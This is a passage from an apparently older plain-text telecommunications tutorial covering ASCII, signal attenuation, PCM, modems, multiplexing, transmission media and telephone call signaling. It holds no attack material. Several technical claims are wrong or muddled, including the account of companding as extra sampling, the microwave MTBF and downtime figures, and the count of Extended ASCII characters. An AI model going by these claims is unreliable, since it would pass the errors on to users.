binary (digital) languages, called character codes, have been created.
Each character of a character code represents a unique letter of the
alphabet:  a digit, punctuation mark, or printing character.

The most popular character code is call ASCII (America Standard Code for
Information Interchange).  It uses a seven bit coding scheme-- each
character consists of a unique combination of seven 1s and 0s.  For
example, the capital letter T is represented by the ASCII 1010100; the
number 3 by the ACSII 0110011. The maximum number of different
characters which can be coded in ASCII is 128).


                      English          ASCII

                         T             1010100

                         3             0110011


Another character code is called Extended ASCII.  Extended ASCII builds
upon the existing ASCII character code.  Extended ASCII codes characters
into eight bits providing 256 character representations).  The extra 127
characters represent foreign language letters and other useful symbols.


Signal Loss - Attenuation

Analog and digital signals are transmitted to provide communication over
long distances.  Unfortunately, the strength of any transmitted signal
weakens over distance.  This phenomenon is called attenuation.  Both
analog and digital signals are subject to attenuation, but the
attenuation is overcome in very different ways.


Analog Attenuation

Every kilometer or so, an analog signal must be amplified to overcome
natural attenuation.  Devices called amplifiers boost all the signals
they receive, strengthening the signals to their original power.  The
problem is that over distance, noise is created and it is boosted along
with the desired signal.

The result of using amplifiers is that both the noise (unwanted
electrical energy) and the signal carrying the information are
amplified.  Because the noise is amplified every kilometer, it can build
up enough energy to make a conversation incomprehensible.  If the noise
becomes too great, communication may become impossible.

Two different types of noise affect signal quality.

      White noise is the result of unwanted electrical signals over
      lines.  When it becomes loud enough, it sounds like the roar of
      the ocean at a distance.

      Impulse noise is caused by intermittent disturbances such as
      telephone company switch activity or lightning.  It sounds like
      pops and crack over the line.

As analog signals pass through successive amplifiers, the noise is
amplified along with the signal and therefore causes the signal to
degenerate.


Digital Attenuation

Although digital signals are also affected by attenuation, they are
capable of a much more effective method to overcome signal loss.  A
device called a regenerative repeater determines whether the incoming
digital signal is a 1 or a 0.  The regenerative repeater then recreates
the signal and transmits it at a higher signal strength.  This method is
more effective than repeating an analog signal because digital signals
can only be one of two possible states.  Remember that an analog signal
is comprised of an infinite number of states.)

The advantage of a digital regenerator is that noise is not reproduced.
At each regenerative repeater, all noise is filtered out-- a major
advantage over analog amplification.


Advantages of Digital over Analog Signals


1.    Digital regenerative repeaters are superior to analog amplifiers.

      A buildup of noise causes a distortion of the waveform.  If the
      distortion is large enough, a signal will not arrive in the same
      form as it was transmitted.  The result is errors in transmission.

      In digital transmission, noise is filtered out leaving a clean,
      clear signal.  A comparison of average error rates shows

                 Analog:    1 error every 100,000 signals

                 Digital:   1 error every 10,000,000 signals

2.    The explosion of modern digital electronic equipment on the market
      has greatly reduced its price, making digital communications
      increasingly more cost effective.  The price of computer chips,
      the brains of electronic equipment, has dropped dramatically in
      recent years further reducing the price of digital equipment.

      This trend will almost certainly continue adding more pressure to
      use digital methods.


3.    An ever increasing bulk of communication is between digital
      equipment (computer-to-computer)

      For most of telephony history, long distance communication meant
      voice telephone conversations.  Because voice is analog in nature,
      it was logical to use analog facilities for transmission.  Now the
      picture is changing.  More and more communication is between
      computers, digital faxes, and other digital transmission devices.

      Naturally, it is preferable to send digital data over digital
      transmission equipment when both sending and receiving devices are
      digital since there is no need to convert the digital signals to
      analog to prepare them for analog transmission.

Historically, telephone networks were intended to carry analog voice
traffic. Therefore, equipment was designed to create, transmit, and
process analog signals.  As technology in computers (microprocessors)
and digital transmission has advanced, nearly all equipment installed in
new facilities are digital.


	.---------------------------.
4	| Analog-Digital Conversion |
	`---------------------------'


Because it offers better transmission quality, almost every long
distance telephone communication now uses digital transmission on the
majority of their lines.  But since voice in its natural form is analog,
it is necessary to convert these.  In order to transmit analog waves
over digital facilities to capitalize on its numerous advantages, analog
waves are converted to digital waves.


Pulse Code Modulation (PCM)

The conversion process is called Pulse Code Modulation (PCM) and is
performed by a device called a codec (coder/decoder).  PCM is a method
of converting analog signals into digital 1s and 0s, suitable for
digital transmission.  At the receiving end of the transmission, the
coded 1s and 0s are reconverted into analog signals which can be
understood by the listener.


Three Step Process of PCM


Step 1 - Sampling


Sampling allows for the recording of the voltage levels at discrete
points in prescribed time intervals along an analog wave.  Each voltage
level is called a sample.  Nyquist's Theorem states:

      If an analog signal is sampled at twice the rate of the highest
      frequency it attains, the reproduced signal will be a highly
      accurate reproduction of the original.

The highest frequency used in voice communications is 4000 Hz (4000
cycles per second).  Therefore, if a signal is sampled 8000 times per
second, the listener will never know they have been connected and
disconnected 8000 times every second!  They will simply recognize the
signal as the voice of the speaker.

To visualize this procedure better, consider how a movie works.  Single
still frames are sped past a light and reproduced on a screen.  Between
each of the frames is a dark space.  Since the frames move so quickly,
the eye does not detect this dark space.  Instead the eye perceives
continuous motion from the still frames.

PCM samples can be compared to the still frames of a movie.  Since the
voice signal is sampled at such frequent intervals, the listener does
not realize that there are breaks in the voice and good quality
reproduction of voice can be achieved.  Naturally, the higher the
sampling rate, the more accurate the reproduction of the signal.  Dr.
Nyquist was the one who discovered that only 8000 samples per second are
needed for excellent voice reproduction.

The 8000 samples per second are recorded as a string of voltage levels.
This string is called a Pulse Amplitude Modulation (PAM) signal.


Step 2 - Quantizing


Since analog waves are continuous and have an infinite number of values,
an infinite number of PAM voltage levels are needed to perfectly
describe any analog wave.  In practice, it would be impossible to
represent each exact PAM voltage level.  Instead, each level is rounded
to the nearest of 256 predetermined voltage levels by a method called
Quantizing.

Quantizing assigns each PAM voltage level to one of 256 amplitude
levels.  The amplitude levels do not exactly match the amplitude of the
PAM signal but are close enough so only a little distortion results.

This distortion is called quantizing error.  Quantizing error is the
difference between the actual PAM voltage level and the amplitude level
it was rounded to.  Quantizing error produces quantizing noise.
Quantizing noise creates an audible noise over the transmission line.

Low amplitude signals are affected more than high amplitude signals by
quantizing noise.  To overcome this effect, a process call companding is
employed.  Low amplitude signals are sampled more frequently than high
amplitude signals.  Therefore, changes in voltage along the waveform
curve can be more accurately distinguished.

Companding reduces the effect of quantizing error on low amplitude
signals where the effect is greatest by increasing the error on high
amplitude signals where the effect is minimal.  Throughout this process,
the total number of samples remains the same at 8000 per second.

Two common companding formulas are used in different parts of the world.
The United States and Japan follow a companding formula called Mu-Law.
In Europe and other areas of the world, the formula is slight different
and is called A-Law.  Although the two laws differ only slightly, they
are incompatible.  Mu-Law hardware cannot be used in conjunction with
A-Law hardware.


Step 3 - Encoding

Encoding converts the 256 possible numeric amplitude voltage levels into
binary  8-bit digital codes.  The number 256 was not arrived at
accidentally. The reason there are 256 available amplitude levels is
that an 8-bit code contains 256 (28) possible combinations of 1s and 0s.
These codes are the final product of Pulse Codes Modulation (PCM) and
are ready for digital transmission.

PCM only provides 256 unique pitches and volumes.  Every sound that is
heard over a phone is one of these 256 possible sounds.

Digital-Analog Conversion

After the digital bit stream is transmitted, it must be convert back to
an analog waveform to be audible to the human ear.  This process is
called Digital-Analog conversion and is essentially the reverse of PCM.

This conversion occurs in three steps.

Step 1 - Decoding

      Decoding converts the 8-bit PCM code into PAM voltage levels.

Step 2 - Reconstruction

      Reconstruction reads the converted voltage level and reproduces
      the original analog wave

Step 3 - Filtering

      The decoding process creates unwanted high frequency noise in the
      4000 Hz - 8000 Hz range which is audible to the human ear.  A
      low-pass filter blocks all frequencies above one-half the sampling
      rate, eliminating any frequencies above 4000 Hz.


	.----------------------.
5	| Digital Transmission |
	`----------------------'

Importance of Digital Transmission

Digital transmission is the movement of computer-encoded binary
information from one machine to another.  Digital information can
represent voice, text, graphics, and video.

Digital communication is important because we use it everyday.  You have
used digital communications if

      - your credit card is scanned at the checkout line of a department
        store.

      - you withdraw money from an automated teller machine. 

      - you make an international call around the world. 

There are a million ways digital communication affects us every day.

As computer technology advances, more and more of our lives are affected
by digital communication.  A vast amount of digital information is
transmitted every second of every day.  Our bank records, our tax
records, our purchasing records, and so much more is stored as digital
information and transferred whenever and wherever it is needed.  It is
no exaggeration to say that digital communications will continue to
change our lives from now on.


Digital Voice Versus Digital Data


The difference between voice and non-voice data is this:

      Voice transmission represents voice while data transmission
      represents any non-voice information, such as text, graphics, or
      video.  Both can be transmitted in identical format--as digitized
      binary digits

In order to distinguish digital voice binary code from digital data,
since they both look like strings of 1s and 0s, you must know what the
binary codes represent.

This leads us to another important distinction-- that between digital
transmission and data transmission.  Although these two terms are often
confused, they are not the same thing.

      Digital transmission describes the format of the electrical
      signal--1s and 0s as opposed to analog waves.

      Data transmission describes the type of information transmitted-
      -text, graphics, or video as opposed to voice.

Basic Digital Terminology

A bit is the smallest unit of binary information--a "1" or a "0"

A byte is a "word" of 7 or 8 bits and can represent a unit of
information such as a letter, a digit, a punctuation mark, or a printing
character (such as a line space).

BPS (bits per second) or bit rate refers to the information transfer
rate-- the number of bits transmitted in one second.  BPS commonly refers
to a transmission speed.

Example: 

      A device rated at 19,200 bps can process more information than one
      rated at 2,400 bps.  As a matter of fact, eight times more.  Bps
      provides a simple quantifiable means of measuring the amount of
      information transferred in one second.

Bits per second is related to throughput.  Throughput is the amount of
digital data a machine or system can process.  One might say a machine
has a "high throughput," meaning that it can process a lot of information.


Digital Data Transmission


Data communications is made up of three separate parts:

   1. Data Terminal Equipment (DTE) is any digital (binary code) device,
      such as a computer, a printer, or a digital fax.

   2. Data Communications Equipment (DCE) are devices that establish,
      maintain, and terminate a connection between a DTE and a facility.
      They are used to manipulate the signal to prepare it for
      transmission.  An example of DCE is a modem.

   3. The transmission path is the communication facility linking DCEs
      and DTEs.


The Importance of Modems


A pair of modems is required for most DTE-to-DTE transmissions made over
the public network.

The function of a modem is similar to the function of a codec, but in
reverse. Codecs convert information that was originally in analog form
(such as voice) into digital form to transmit it over digital
facilities.  Modems do the opposite.  They convert digital signals to
analog to transmit them over analog facilities.

It continues to be necessary to convert analog signals to digital and
then back again because the transmission that travels between telephone
company COs is usually over digital facilities.  The digital signals
travel from one telephone company Central Office to another over high
capacity digital circuits.  Digital transmission is so superior to
analog transmission that it is worth the time and expense of converting
the analog signals to digital signals.

Since computers communicate digitally, and most CO-to-CO facilities are
digital, why then is it necessary to convert computer-generated digital
data signals to analog before transmitting them?

The answer is simple.  Most lines from a local Central Office to a
customer's residence or business (called the local loop) are still
analog because for many years, the phone company has been installing
analog lines into homes and businesses.  Only very recently have digital
lines begun to terminate at the end user's premises.

It is one thing to convert a telephone company switch from analog to
digital. It is quite another to rewire millions of individual customer
sites, each one requiring on-site technician service.  This would
require a massive effort that no institution or even industry could
afford to do all at one time.

In most cases, therefore, we are left with a public network that is part
analog and part digital.  We must, therefore, be prepared to convert
analog to digital and digital to analog.


Modulation/Demodulation


To transmit data from one DCE to another, a modem is required when any
portion of the transmitting facility is analog.  The modem (modulater/
demodulater) modulates and demodulates digital signals for
transmission over analog lines.  Modulation means "changing the
signals."  The digital signals are changed to analog, transmitted, and
then changed back to digital at the receiving end.

Modems always come in pairs-- one at the sending end and one at the
receiving end.  Their transmission rates vary from 50 bps to 56 Kbps
(Kilobits per second).


Synchronous Versus Asynchronous


There are two ways digital data can be transmitted:

Asynchronous transmission sends data one 8-bit character at a time.  For
example, typing on a computer sends data from the keyboard to the
processor of the computer one character at a time. Start and stop bits
attach to the beginning and end of each character to alert the receiving
device of incoming information.  In asynchronous transmission, there is
no need for synchronization.  The keyboard will send the data to the
processor at the rate the characters are typed.  Most modems transmit
asynchronously.

Synchronous transmission is a method of sending large blocks of data at
fixed intervals of time. The two endpoints synchronize their clocking
mechanisms to prepare for transmission.  The success of the transmission
depends on precise timing.

Synchronous transmission is preferable when a large amount of data must
be transmitted frequently.  It is better suited for batch transmission
because it groups data into large blocks and sends them all at once.

The equipment need for synchronous transmission is more expensive than
for asynchronous transmission so a data traffic study must be made to
determine if the extra cost is justified.  Asynchronous transmission is
more cost effective when data communication is light and infrequent.


Error Control


The purpose of error control is to detect and correct errors resulting
from data transmission.

There are several methods of performing error control.  What most
methods have in common is the ability to add an error checking series of
bits at the end of a block of data that determines whether the data
arrived correctly. If the data arrived with errors, it will contact the
sending DTE and request the information be re-transmitted.  Today's
sophisticated error checking methods are so reliable that, with the
appropriate equipment, it is possible to virtually guarantee that data
transmission will arrive error-free.  There are almost no reported cases
of a character error in received faxes.

Error control is much more critical in data communication than in voice
communication  because in voice communication, if one or two of the 8000
PCM signals per second arrive with an error, it will make almost no
difference to the quality of the voice representation received.  But,
imagine the consequences of a bank making a funds transfer and
misplacing a decimal point on a large account.



	.--------------.
6	| Multiplexing |
	`--------------'


Function of Multiplexers

Analog and digital signals are carried between a sender and receiver
over transmission facilities.  It costs money to transmit information
signals from Point A to Point B.  It is, therefore, of prime importance
to budget conscious users to minimize transmission costs.

The primary function of multiplexers is to decrease network facility
line costs.

Multiplexing is a technique that combines many individual signals to
form a single composite signal.  This allows the transmission of
multiple simultaneous calls over a single line.  It would cost a lot
more money to have individual lines for each telephone than to multiplex
the signals and send them over a single line.

Typical transmission facilities in use today can transmit 24 to 30 calls
over one line.  This represents a significant savings for the end user
as well as for commercial long distance and local distance carriers.


Bandwidth

The bandwidth of a transmission medium is a critical factor in
multiplexing. Bandwidth is the difference between the highest and lowest
frequencies in a given range.  For example, the frequency range of the
human voice is between 300 Hz and 3300 Hz.  Therefore, the voice
bandwidth is

           3300 Hz - 300 Hz  =  3000 Hz

We also refer to the bandwidth of a transmission medium.  A transmission
medium can have a bandwidth of 9600 Hz.  This means that it is capable
of transmitting a frequency range up to 9600 Hz.  A medium with a large
bandwidth can transmit more information and be divided into more
channels than a medium with a small bandwidth.

We will investigate three different methods of multiplexing:

                Frequency Division Multiplexing (FDM)
                Time Division Multiplexing (TDM)
                Statistical Time Division Multiplexing (STDM)


Frequency Division Multiplexing (FDM)

FDM is the oldest of the three methods of multiplexing.  It splits up
the entire bandwidth of the transmission facility into multiple smaller
slices of bandwidth.  For example, a facility with a bandwidth of 9600
Hz can be divided into four communications channels of 2400 Hz each.
Four simultaneous telephone conversations can therefore be active on the
same line.

Logically, the sum of the separate transmission rates cannot be more
than the total transmission rate of the transmission facility:  the 9600
Hz facility could not be divided into five 2400 Hz channels because  5 x
2400 is greater than 9600.

Guard bands are narrow bandwidths (about 1000 Hz wide) between adjacent
information channels (called frequency banks) which reduce interference
between the channels.

The use of FDM has diminished in recent years, primarily because FDM is
limited to analog transmission, and a growing percentage of transmission
is digital.


Time Division Multiplexing (TDM)


Time division multiplexing has two main advantages over frequency
division multiplexing:

           - It is more efficient
           - It is capable of transmitting digital signals

Instead of the bandwidth of the facility being divided into frequency
segments, TDM divides the capacity of a transmission facility into short
time intervals called time slots.

TDM is slightly more difficult to conceptualize than FDM.  An analogy
helps.

The problem is

      We must transport the freight of five companies from New York to
      San Francisco.  Each company wants their freight to arrive on the
      same day.  We must be as fair as we can to prevent one company's
      freight from arriving before another company's.  The freight from
      each company will fit into 10 boxcars so a total of 50 boxcars
      must be sent.  Essentially, there are three different ways we can
      accomplish this.

        1. We can rent five separate locomotives and rent five
           separate railway tracks and send each company's freight on
           its own line.

        2. We can rent five separate locomotives, but only one track and
           send five separate trains along one line.

        3. We can join all the boxcars together and connect them to one
           engine and send them over a single track.

Obviously the most cost effective solution is Number 3.  It saves us
from renting four extra rail lines and four extra locomotives.

To distribute the freight evenly so that each company's freight arrives
at the same time, the could be placed in a pattern as illustrated below:

  Company A + Company B + Company C + Company A + Company B + Company C . . .

At San Francisco, the boxcars would be reassembled into the original
groups of 10 for each company and delivered to their final destination.

This is exactly the principle behind TDM.  Use one track (communication
channel), and alternate boxcars (pieces of information) from each
sending company (telephone or computer).

In other words, each individual sample of a voice or data conversation
is alternated with samples from different conversations and transmitted
over the same line.

Let's say we have four callers in Boston (1, 2, 3, and 4) who want to
speak with four callers in Seattle (A, B, C, and D).  The task is to
transmit four separate voice conversations (the boxcars) over the same
line (the track).

The voice conversations are sampled by PCM.  This breaks each
conversation into tiny 8-bit packets.  For a brief moment, caller 1
sends a packet to receiver A.  Then, caller 2 sends a packet to receiver
B-- and so on.  The result is a steady stream of interleaved
packets-- just like our train example except the boxcars stretch all
across the country.  Notice that every fourth packet is from the same
conversation.  At the receiving end, the packets are reassembled and
sent to the appropriate receiver at the rate of 8000 samples per
seconds.

Remember that if the receiver hears the samples at the rate of 8000
times per second, it will result in good quality voice reproduction.
Therefore, the packets are transmitted fast enough so that every 1/8000
of a second, a packet from each send arrives at the appropriate
receiver.  In other words, each conversation is connected 8000 times per
second-- enough to satisfy Nyquist's Theorem.

In FDM the circuit was divided into individual frequency channels for
use by each sender.  In contrast, TDM divides the circuit into
individual time channels.  For a brief moment, each sender is allocated
the entire bandwidth-- just enough time to send eight bits of
information.


TDM Time Slots


Because a version of the TDM process (called STDM) is the primary
switching technique in use today, it is important that this challenging
concept be presented as clearly and understandably as possible.  Here is
a closer look at TDM, emphasizing the "T"--which stands for time.

Each transmitting device is allocated a time slot during which it is
permitted to transmit.  If there are three transmitting devices, for
example, there will be three time slots.  If there are four devices
there will be four time slots.

Two devices, one transmitting and one receiving, are interconnected by
assigning them to the same time slot of a circuit.  This means that
during their momentary shared time slot, the transmitting device is able
to send a short burst of information (usually eight bits) to the
receiving device.  During their time slot, they use the entire bandwidth
of the transmission facility but only for a short period of time.  Then,
in sequence, the following transmitting devices are allocated time slots
during which they too use the whole bandwidth.

Clock A and Clock B at either end of the transmission must move
synchronously. They rotate in unison, each momentarily making contact
with the two synchronized devices (one sender and one receiver).  For
precisely the same moment, Clock A will be in contact with Sender 1 and
Clock B will be in contact with Receiver 1, allowing one sample (8 bits)
of information to pass through. The they will both rotate so that clock
A comes into contact with Sender 2 and Clock B with Receiver 2.  Again,
one sample of information will pass.  This process is repeated for as
long as needed.

How fast must the clocking mechanism rotate?  Again, the answer is
Nyquist's theorem.  If a signal is sampled 8000 times per second, an
accurate representation of voice will result at the receiving end.  The
same theory applies with TDM.  If the clocking mechanism rotates 8000
times per second, the rate of transfer from each sender and receiver
must also be 8000 times per second.  This is so because every revolution
of the two clocking mechanisms result in each input and output device
making contact once.  TDM will not work if the clocking mechanism
synchronization is off.

Each group of bits from one rotation of the clocking mechanism is called
a frame. One method for maintaining synchronization is inserting a frame
bit at the end of each frame.  The frame bit alerts the demultiplexer of
the end of a frame.


Statistical Time Division Multiplexing (STDM)


STDM is an advanced form of TDM and is the primary switching technique
is use now.  The drawback of the TDM process is that if a device is not
currently transmitting, its time slot is left unused and is therefore
wasted.

In contrast, is STDM, carrying capacity is assigned dynamically.  If a
device is not transmitting, its time slot can be used by the other
devices, speeding up their transmission.  In other words, a time slot is
assigned to a device only if it has information to send.  STDM
eliminates wasted carrying capacity.



	.--------------------.
7	| Transmission Media |
	`--------------------'


Voice and data information is represented by waveforms and transmitted
to a distant receiver.  However, information does not just magically
route itself from Point A to Point B.  It must follow some predetermined
path.  This path is called a transmission medium, or sometimes a
transmission facility.

The type of transmission medium selected to join a sender and receiver
can have a huge effect on the quality, price, and success of a
transmission. Choosing the wrong medium can make the difference between
an efficient transmission and an inefficient transmission.

Efficient means choosing the most appropriate medium for a given
transmission.  For example, the most efficient medium for transmitting a
normal call from your home to your neighbor is probably a simple pair of
copper wires.  It is inexpensive and it gets the job done.  But if we
were to transmit 2-way video teleconferencing from Bombay to Burbank,
one pair of wires might be the least efficient medium and get us into a
lot of trouble.

A company may buy all the right equipment and understand all the
fundamentals, but if they transmit over an inappropriate medium, they
would probably be better off delivering handwritten messages than trying
to use the phone.

There are a number of characteristics that determine the appropriateness
of each medium for particular applications:

                 - cost 
                 - ease of installation 
                 - capacity
                 - rate of error

In choosing a transmission medium, these and many other factors must be
taken into consideration.


Terminology


The transmission media used in telecommunications can be divided into
two major categories:  conducted and radiated.  Examples of conducted
media include copper wire, coaxial cable, and fiber optics.  Radiated
media include microwave and satellite.

A circuit is a path over which information travels.  All of the five
media serve as circuits to connect two or more devices.

A channel is a communication path within a circuit.  A circuit can
contain one or more channels.  Multiplexing divides one physical link
(circuit) into several communications paths (channels).

The bandwidth of a circuit is the range of frequencies it can carry.
The greater the range of frequencies, the more information can be
transmitted. Some transmission media have a greater bandwidth than
others and are therefore able to carry more traffic.

The bandwidth of a circuit is directly related to its capacity to carry
information.

Capacity is the amount of information that may pass through a circuit in
a given amount of time.  A high capacity circuit has a large amount of
bandwidth-- a high range of frequencies-- and can therefore transmit a 
lot of information.

Copper Cable

Copper cable has historically been the most common medium.  It has been
around for many years and today is most prevalent in the local loop--the
connection between a residence or business and the local telephone
company.

Copper cables are typically insulated and twisted in pairs to minimize
interference and signal distortion between adjacent pairs.  Twisting the
wires into pairs results in better quality sound which is able to travel
a greater distance.

Shielded twisted pair is copper cable specially insulated to reduce the
high error rate associated with copper transmission by significantly
reducing attenuation and noise.

Copper cable transmission requires signal amplification approximately
every 1800 meters due to attenuation.

Advantages of Copper Cable

There is plenty of it and its price is relatively low.

Installation of copper cable is relatively easy and inexpensive.


Disadvantages of Copper Cable

Copper has a high error rate.

Copper cable is more susceptible to electromagnetic interference (EMI) and 
radio frequency interference (RFI) than other media.  These effects can 
produce noise and interfere with transmission.
      
Copper cable has limited bandwidth and limited transmission capacity.

The frequency spectrum range (bandwidth) of copper cable is relatively low
-- approximately one megahertz (one million Hz).  Copper circuits can be 
divided into fewer channels and carry less information than the other media.


Typical Applications of Copper Cable

Residential lines from homes to the local CO (called the local loop).

Lines from business telephone stations to an internal PBX.

Coaxial Cable

Coaxial cable was developed to provide a more effective way to isolate
wires from outside influence, as well as offering greater capacity and
bandwidth than copper cable.

Coaxial cable is composed of a central conductor wire surrounded by
insulation, a shielding layer and an outer jacket.

Coaxial cable requires signal amplification approximately every 2000
meters.


Advantages of Coaxial Cable

Coaxial cable has higher bandwidth and greater channel capacity than 
copper wire.  It can transmit more information over more channels than 
copper can.

Coaxial cable has lower error rates.  Because of its greater insulation, 
coaxial is less affected by distortion, noise, crosstalk (conversations 
from adjacent lines), and other signal impairments.

Coaxial cable has larger spacing between amplifiers.

Disadvantages of Coaxial Cable

Coaxial cable has high installation costs.  It is thicker and 
less flexible and is more difficult to work with than copper wire.

Coaxial cable is more expensive per foot than copper cable.


Typical Applications

      - Data networks

      - Long distance networks

      - CO-to-CO connections

Microwave

For transmission by microwave, electrical or light signals must be
transformed into high-frequency radio waves.  Microwave radio transmits
at the high end of the frequency spectrum --between one gigahertz (one
billion Hz) and 30 GHz.

Signals are transmitted through the atmosphere by directly aiming one
dish at another.  A clear line-of-sight must exist between the
transmitting and receiving dishes because microwave travels in a
straight line.  Due to the curvature of the earth, microwave stations
are spaced between 30 and 60 kilometers apart.

To compensate for attenuation, each tower is equipped with amplifiers
(for analog transmission) or repeaters (for digital transmission) to
boost the signal.

Before the introduction of fiber optic cable in 1984, microwave served
as the primary alternative to coaxial cable for the public telephone
companies.


Advantages of Microwave


Microwave has high capacity.  Microwave transmission offers greater
bandwidth than copper or coaxial cable resulting in higher transmission
rates and more voice channels.

Microwave has low error rates.

Microwave systems can be installed and taken down quickly and inexpensively. 
They can be efficiently allocated to the point of greatest need in a
network. Microwave is often used in rural areas because the microwave
dishes can be loaded on trucks, moved to the desired location, and
installed quickly.

Microwave requires very little power to send signals from dish to dish
because transmission does not spread out into the atmosphere.  Instead
it travels along a straight path toward the next tower.

Microwave has a low Mean Time Between Failures (MTBF) of 100,000
hours-- or only six minutes of down time per year.

Microwave is good for bypassing inconvenient terrain such as mountains
and bodies of water.

Disadvantages of Microwave


Microwave is susceptible to environmental distortions.  Factors such as
rain, snow, and heat can cause the microwave beam to bend and vary.
This affects signal quality.

Microwave dishes must be focused in a straight line-of-sight.  This can
present a problem over certain terrain or in congested cities.
Temporary physical line-of-sight interruptions, such as a bird or plane
flying through the signal pathway, can result in a disruption of
signals.

Microwave usage must be registered with appropriate regulatory agencies.
These agencies monitor and allocate frequency assignments to prevent
systems from interfering with each other.

Extensive use of microwave in many busy metropolitan areas has filled up
the airwaves, limiting the availability of frequencies.


Typical Applications

      - Private networks

      - Long distance networks


Satellite


Satellite communication is a fast growing segment of the
telecommunications market because it provides reliable, high capacity
circuits.

In most respects, satellite communication is similar to microwave
communication.  Both use the same very high frequency (VHF) radio waves
and both require line-of-sight transmission.  A satellite performs
essentially the same function as a microwave tower.

However, satellites are positioned 36,000 kilometers above the earth in
a geosynchronous orbit,  This means they remain stationary relative to a
given position on the surface of earth.

Another difference between microwave and satellite communications is
their transmission signal methods.  Microwave uses only one frequency to
send and receive messages.  Satellites use two different
frequencies--one for the uplink and one for the downlink.

A device called a transponder is carried onboard the satellite.  It
receives an uplink signal beam from a terrestrial microwave dish,
amplifies (analog) or regenerates (digital) the signal, then retransmits
a downlink signal beam to the destination microwave dish on the earth.
Today's satellites have up to 48 transponders, each with a capacity
greater than 100 Mbps.

Because of the long distance traveled, there is a propagation delay of
1/2 second inherent in satellite communication.  Propagation delay is
noticeable in phone conversations and can be disastrous to data
communication.

A unique advantage of satellite communication is that transmission cost
is not distance sensitive.  It costs the same to send a message across
the street as around the world.

Another unique characteristic is the ability to provide
point-to-multipoint transmission.  The area of the surface of the earth
where the downlinked satellite signals can be received is called its
footprint.  Information uplinked from the earth can be broadcast and
retransmitted to any number of receiving dishes within the satellite's
footprint.  Television broadcast is a common application of
point-to-multipoint transmission.


Advantages of Satellite Transmission


Satellite transmission provides access to wide geographical areas (up to the 
size of the satellite's footprint), point-to-multipoint broadcasting, a large 
bandwidth, and is very reliable.


Disadvantages of Satellite Transmission


Problems associated with satellite transmission include: propagation delay, 
licensing requirement by regulatory agencies security issue concerning the 
broadcast nature of satellite transmission.  Undesired parties within a 
satellites footprint may illicitly receive downlink transmission.

Installation requires a satellite in orbit.


Fiber Optics


Fiber optics is the most recently developed transmission medium.  It
represents an enormous step forward in transmission capacity.  A recent
test reported transmission rates of 350 Gbps (350 billion bits), enough
bandwidth to support millions of voice calls.  Furthermore, a recently
performed record- setting experiment transmitted signals 10,000 Km
without the use of repeaters, although in practice 80 to 300 Km is the
norm.  Recall the need for repeaters every kilometer or so with copper
wire and coaxial.

Fiber optics communication uses the frequencies of light to send
signals.  A device called a modulator converts electrical analog or
digital signals into light pulses.  A light source pulses light on and
off billions and even trillions of times per second (similar to a
flashlight turned on and off-- only faster). These pulses of light are
translated into binary code.  The positive light pulse represents 1; a
negative light pulse (no light) represents 0.  Fiber optics is digital
in nature.

The light is then transmitted along a glass or plastic fiber about the
size of a human hair.  At the receiving end, the light pulses are
detected and converted back to electrical signals by photoelectric
diodes.

Advantages of Fiber Optics

Fiber optics has an extremely high bandwidth.  In fact, fiber optic
bandwidth is almost infinite, limited only by the ability of engineers
to increase the frequency of the pulses of light.  Current technology
achieves a frequency of 100 terahertz (one million billion).

Fiber optics is not subject to interference or electromagnetic
impairments as are the other media.

Fiber optics has an extremely low error rate-- approximately one error
per 1,000,000,000,000.

Fiber optics has a low energy loss translating into fewer
repeaters/regenerators per long distance transmission.

Fiber is a glass and glass is made of sand.  There will never by a
shortage of raw material for fiber.


Disadvantages of Fiber Optics


Installation costs are high for a fiber optic system.  Currently it
costs approximately $41,000 per km to install a fiber optic system.  The
expense of laying fiber is primarily due to the high cost of splicing
and joining fiber.  The cost will almost certainly decrease dramatically
as less expensive methods of splicing and joining fiber are introduced.

A potential disadvantage of fiber optics results from its enormous
carrying capacity.  Occasionally a farmer or construction worker will
dig into the earth and unintentionally split a fiber optic cable.
Because the cable can carry so much information, an entire city could
lose its telephone communication from just one minor mishap.


	.-----------.
8	| Signaling |
	`-----------'

Types of Signals

When a subscriber picks up the phone to place a call, he dials digits to
signal the network.  The dialed digits request a circuit and tell the
network where to route the call--a simple enough procedure for the
caller.  But in fact, it involves a highly sophisticated maze of
signaling to and from switches and phones to route and monitor the call.
Signaling functions can be divided into three main categories.


Supervisory

      Supervisory signals indicate to the party being called and the CO
      the status of lines and trunks--whether they are idle, busy, or
      requesting service.  The signals detect and initiate service on
      requesting lines and trunks.  Signals are activated by changes in
      electrical state and are caused by events such as a telephone
      going on-hook or off-hook. Their second function is to process
      requests for telephone features such as call waiting.


Addressing

      Addressing signals determine the destination of a call.  They
      transmit routing information throughout the network.  Two of the
      most important are

      Dial Pulse:     These address signals are generated by alternately
                      opening and closing a contact in a rotary phone
                      through which direct current flows.  The number of
                      pulses corresponds to the number of the dialed
                      digit.

      Tone:           These address signals send a unique tone or
                      combination of tones which correspond to the
                      dialed digit.


Alerting

      Alerting signals inform the subscriber of call processing
      conditions.. These signals include:

           Dial tone
           The phone ringing
           Flashing lights that substitute for phone ringing
           Busy signal

Let's take a look at how signaling is used to set up a typical call over
the public network.

Step 1 -   Caller A goes off-hook

Step 2 -   The CO detects a change in state in the subscriber's line.
           The CO responds by sending an alerting signal (dial tone) to
           caller A to announce that dialing may begin.  The CO marks
           the calling line busy so that other subscribers can not call
           into it.  If another subscriber attempts to phone caller A,
           he will get the alerting busy signal.  Caller A dials the
           digits using tones from the keypad or dial pulses from a
           rotary phone.

Step 3 -   The dialed digits are sent as addressing signals from caller
           A to CO A

Step 4 -   CO A routes the addressing signals to CO B.

Step 5 -   Supervisory signals in CO B test caller B to determine if the
           line is free.  The line is determined to be free.

Step 6 -   CO B sends alerting signals to caller B, which causes caller
           B's telephone to ring.


This is an example of a local call which was not billed to the customer.
If the call had been a billable, long distance call, it would have used
a supervisory signal known as answer supervision.  When the receiving
end of a long distance call picks up, it sends a signal to its local CO.
The CO then sends an answer supervision signal to the caller's CO
telling it that the phone was picked up and it is time to begin billing.


Where on the Circuit Does Signaling Occur?

There are only three places where signaling can occur: 

      In-band means on the same circuit as voice, within the voice
      frequency range (between 300 and 3400 Hz).

      Out-of-band means on the same circuit as voice, outside of the
      voice frequency range (3400 - 3700 Hz).

      Common Channel Signaling (CCS) means signaling occurs on a
      completely separate circuit.


The frequency range of human voice is approximately 0 - 4000 Hz.
However, most voice signals fall in the area between 300 and 3400 Hz.
Therefore, to save bandwidth, telephones only recognize signals between
300 and 3400 Hz. It is conceivable that someone with an extremely high
voice would have difficulty communicating over the telephone.


In-band and Out-of-band


